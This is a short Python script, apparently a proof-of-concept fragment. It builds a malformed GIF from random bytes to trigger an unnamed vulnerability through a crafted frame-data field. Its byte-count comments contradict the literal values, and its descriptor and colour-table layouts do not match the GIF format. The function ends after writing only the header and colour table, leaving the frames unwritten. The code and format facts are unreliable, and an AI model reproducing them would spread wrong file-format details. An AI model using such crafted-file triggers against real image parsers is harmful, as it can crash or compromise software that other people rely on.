#!/usr/bin/env python3

import struct
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor
def generate_random_gif(
        rng: BinaryIO, out: BinaryIO
    ):
    header = b'GIF89a' + (b'\0'*11)[:7] # 12 bytes
    gct = b'\xff\xff\xff\xff' # GCT size = 4 x 8 bits = 32 colors
    screen_descr = b'\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\x00\x01\x00' # 18 bytes
    # each image descripter takes up 10 bytes:
    #   image_descr = b'\0\0\0\0\0\0\0\0\xff\xff\x00' # 10 bytes
    frames = []
    for i in range(0, 5):
        frame = bytearray([])

        # Image descriptor:
        frame += b'\0\0\0\0\0\xff\xff\x00'

        # Local color table:
        frame += b'\0\0\xff\xff' # LCT size = 4 x 8 bits = 32 colors

        # Actual pixels:
        for j in range(0, 64 * 64):
            frame.append(rng.read(1)[0])

        # Delay time and transparent index:
        frame += b'\0\0\0\0'

        frames.append(frame)

    out.write(header)
    out.write(gct)
